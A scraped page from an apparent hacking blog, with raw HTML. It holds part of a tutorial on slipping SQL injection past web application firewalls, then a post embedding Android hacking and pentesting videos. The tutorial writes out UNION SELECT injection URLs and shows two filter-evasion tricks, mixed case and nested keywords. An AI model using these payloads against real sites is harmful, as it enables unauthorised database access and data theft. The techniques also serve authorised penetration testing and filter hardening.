href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEDgOIZRwVKoEbcec16l1O2SlTUZCnMdp1aJv-SaxNJzG9fqqfwb3RTPkiUntThUxncQdUUHJqL7XgoLgZSaoIHnMT5kQZ62QhDR6lfbpWTKCwf1fFUFFCEU9lk4kNjrpSkY6D4rLht-au/s1600/5a.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEDgOIZRwVKoEbcec16l1O2SlTUZCnMdp1aJv-SaxNJzG9fqqfwb3RTPkiUntThUxncQdUUHJqL7XgoLgZSaoIHnMT5kQZ62QhDR6lfbpWTKCwf1fFUFFCEU9lk4kNjrpSkY6D4rLht-au/s1600/5a.png" /></a></div><b><br /> Capitalization Of Functions:-<br /> </b>Some WAF’s will filter only lowercase alphabets, So we can easily evade this by case changing.<br /> <br /> <b>Actual query</b><br /> http://vulnerablesite.com/detail.php?id=44 UNION SELECT 1,2,3,4,5—<br /> <br /> <b>Query to bypass the WAF</b><br /> <br /> http://vulnerablesite.com/detail.php?id=-1 uNiOn SeLeCt 1,2,3,4,5—<br /> <br /> <br /> <b>Replaced Keywords:-</b><br /> <br /> Some WAF's will escape certain keywords such as UNION, SELECT, ORDER BY, etc. This can be used to our advantage by duplicating the detected word within another.<br /> <br /> <b>Actual query</b><br /> http://vulnerablesite.com/detail.php?id=-1 UNION SELECT 1,2,3,4,5—<br /> <b>Query to bypass the WAF</b><br /> http://vulnerablesite.com/detail.php?id=-1 UNIunionON SEselectLECT 1,2,3,4,5--<br /> <br /> Hope You like this small tutorial.

How to bypass WAF (Web Application Firewall ) Attack On Sqli

Hello Friends as i previously spooked many times about sqli which is one of the common attack on website so today i am revealing one more tr...

Read more »

Android Hacking And Pentesting Video Tutorials

Hi everyone as the days progresses we need to smart enough to know about what you are holding on your hand that is a smart phone which is running Android.<br /> So here is a series of video tutorial that will teach you how to hack as well as how to secure android application.<br /> <br /> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiobH0EX1o8JLlU6EpkZxlG0BhrXhgknG7Oesu0EA84q0K2NITtcVtqiiD3Yjz8u0HmO2JuSZA2wQrhxBSagyZxQCRpdviGPWm0Qx4sSBCq4m9Me_EwWpu9sWejdJYHcJ8pNgReR85Ob7bw/s1600/android_developer_tutorial.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Android Hacking Video Tutorials " src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiobH0EX1o8JLlU6EpkZxlG0BhrXhgknG7Oesu0EA84q0K2NITtcVtqiiD3Yjz8u0HmO2JuSZA2wQrhxBSagyZxQCRpdviGPWm0Qx4sSBCq4m9Me_EwWpu9sWejdJYHcJ8pNgReR85Ob7bw/s1600/android_developer_tutorial.jpg" /></a></div>These video series contain Android forensics , Network security,Android Malware Creation And other such topic.<br /> as well as building environment for security auditing. <br /> Here are the tutorials.<br /> <li><h2>About Android Hacking And Pentesting Video Series </h2><iframe width="560" height="315" src="//www.youtube.com/embed/w3i7y35WcaM" frameborder="0" allowfullscreen></iframe><br /> <li><h2>Brief Introduction to Android and its Architecture </h2><iframe width="560" height="315" src="//www.youtube.com/embed/bMAtQXlKjtc" frameborder="0" allowfullscreen></iframe><br /> <br /> <b>Chandrakant Nial</b>:If You need the pdf file of (Brief Introduction to Android and its Architecture)i will send you, comment below your mail address. <br /> <br /> comment below or drop email at srinivas@101hacker.com for any further query and doubt.<br /> <br /> From: <a href="http://www.101hacker.com/">101Hacker</a>

Android Hacking And Pentesting Video Tutorials

Hi everyone as the days progresses we need to smart enough to know about what you are holding on your hand that is a smart phone which is ru...

Read more »